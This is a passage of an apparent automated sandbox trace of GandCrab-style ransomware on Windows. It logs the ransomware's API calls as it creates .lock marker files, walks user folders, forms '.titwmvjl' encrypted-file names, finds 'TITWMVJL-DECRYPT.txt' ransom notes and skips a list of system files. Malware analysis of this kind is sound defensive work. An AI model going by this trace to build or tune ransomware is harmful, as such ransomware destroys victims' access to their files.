75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0079.156] WriteFile (in: hFile=0x2e4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e068, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e068*=0x2162, lpOverlapped=0x0) returned 1 [0079.157] CloseHandle (hObject=0x2e4) returned 1 [0079.159] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.159] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.160] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x18, wMilliseconds=0x1d3)) [0079.160] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.160] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0079.160] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0079.160] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\d2ca4a09d2ca4deb61a.lock") returned 125 [0079.160] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\smartart graphics\\1033\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2e4 [0079.160] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.161] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.161] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\") returned 101 [0079.161] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\*" [0079.161] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\*", fInfoLevelId=0x1, lpFindFileData=0x259e084, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e084) returned 0x5037b8 [0079.161] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.161] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0079.162] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.162] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.162] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0079.162] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0079.162] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0079.162] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\d2ca4a09d2ca4deb61a.lock" [0079.162] lstrlenW (lpString=".titwmvjl") returned 9 [0079.162] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\d2ca4a09d2ca4deb61a.lock") returned 125 [0079.162] VirtualAlloc (lpAddress=0x0, dwSize=0x13a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.162] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 134 [0079.162] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\d2ca4a09d2ca4deb61a.lock") returned 125 [0079.162] lstrlenW (lpString=".lock") returned 5 [0079.162] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.162] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0079.162] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.163] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.163] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0079.163] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0079.163] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0079.163] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\TITWMVJL-DECRYPT.txt" [0079.163] lstrlenW (lpString=".titwmvjl") returned 9 [0079.163] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\TITWMVJL-DECRYPT.txt") returned 121 [0079.163] VirtualAlloc (lpAddress=0x0, dwSize=0x132, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.163] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 130 [0079.163] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\TITWMVJL-DECRYPT.txt") returned 121 [0079.163] lstrlenW (lpString=".txt") returned 4 [0079.163] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.163] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0079.163] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0079.163] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.164] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\TITWMVJL-DECRYPT.txt") returned 121 [0079.164] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\TITWMVJL-DECRYPT.txt") returned 121 [0079.164] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0079.164] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0079.164] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0079.164] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0079.164] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0079.164] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0079.164] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0079.164] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0079.164] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.164] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 0 [0079.164] FindClose (in: hFindFile=0x5037b8 | out: hFindFile=0x5037b8) returned 1 [0079.165] CloseHandle (hObject=0x2e4) returned 1 [0079.165] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0079.165] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0079.165] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0079.165] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\d2ca4a09d2ca4deb61a.lock" [0079.165] lstrlenW (lpString=".titwmvjl") returned 9 [0079.165] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\d2ca4a09d2ca4deb61a.lock") returned 120 [0079.165] VirtualAlloc (lpAddress=0x0, dwSize=0x130, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.165] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 129 [0079.165] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\d2ca4a09d2ca4deb61a.lock") returned 120 [0079.165] lstrlenW (lpString=".lock") returned 5 [0079.165] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.165] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0079.165] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.166] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.166] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0079.166] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0079.166] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0079.166] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\TITWMVJL-DECRYPT.txt" [0079.166] lstrlenW (lpString=".titwmvjl") returned 9 [0079.166] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\TITWMVJL-DECRYPT.txt") returned 116 [0079.166] VirtualAlloc (lpAddress=0x0, dwSize=0x128, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.166] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 125 [0079.166] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\TITWMVJL-DECRYPT.txt") returned 116 [0079.166] lstrlenW (lpString=".txt") returned 4 [0079.166] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.166] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0079.166] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0079.166] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.166] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\TITWMVJL-DECRYPT.txt") returned 116 [0079.167] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\TITWMVJL-DECRYPT.txt") returned 116 [0079.167] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0079.167] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0079.167] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0079.167] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0079.167] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0079.167] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0079.167] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0079.167] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0079.167] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.167] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 0 [0079.167] FindClose (in: hFindFile=0x503738 | out: hFindFile=0x503738) returned 1 [0079.168] CloseHandle (hObject=0x2dc) returned 1 [0079.168] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0079.168] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0079.168] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0079.168] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\TITWMVJL-DECRYPT.txt" [0079.168] lstrlenW (lpString=".titwmvjl") returned 9 [0079.168] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\TITWMVJL-DECRYPT.txt") returned 98 [0079.168] VirtualAlloc (lpAddress=0x0, dwSize=0x104, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.168] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 107 [0079.168] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\TITWMVJL-DECRYPT.txt") returned 98 [0079.168] lstrlenW (lpString=".txt") returned 4 [0079.168] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.169] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0079.169] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0079.169] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.169] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\TITWMVJL-DECRYPT.txt") returned 98 [0079.169] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\TITWMVJL-DECRYPT.txt") returned 98 [0079.169] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0079.169] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0079.169] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0079.169] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0079.169] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0079.169] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0079.169] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0079.169] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0079.169] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.169] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 0 [0079.169] FindClose (in: hFindFile=0x503278 | out: hFindFile=0x503278) returned 1 [0079.170] CloseHandle (hObject=0x2d4) returned 1 [0079.170] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0079.171] FindClose (in: hFindFile=0x503638 | out: hFindFile=0x503638) returned 1 [0079.171] CloseHandle (hObject=0x2cc) returned 1 [0079.171] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0079.171] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0079.171] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0079.171] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\d2ca4a09d2ca4deb61a.lock" [0079.171] lstrlenW (lpString=".titwmvjl") returned 9 [0079.171] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\d2ca4a09d2ca4deb61a.lock") returned 94 [0079.171] VirtualAlloc (lpAddress=0x0, dwSize=0xfc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.172] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 103 [0079.172] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\d2ca4a09d2ca4deb61a.lock") returned 94 [0079.172] lstrlenW (lpString=".lock") returned 5 [0079.172] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.172] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0079.172] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.172] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.172] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0079.172] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0079.172] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0079.172] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\TITWMVJL-DECRYPT.txt" [0079.172] lstrlenW (lpString=".titwmvjl") returned 9 [0079.172] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\TITWMVJL-DECRYPT.txt") returned 90 [0079.172] VirtualAlloc (lpAddress=0x0, dwSize=0xf4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.173] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 99 [0079.173] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\TITWMVJL-DECRYPT.txt") returned 90 [0079.173] lstrlenW (lpString=".txt") returned 4 [0079.173] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.173] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0079.173] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0079.173] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.173] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\TITWMVJL-DECRYPT.txt") returned 90 [0079.173] lstrlenW 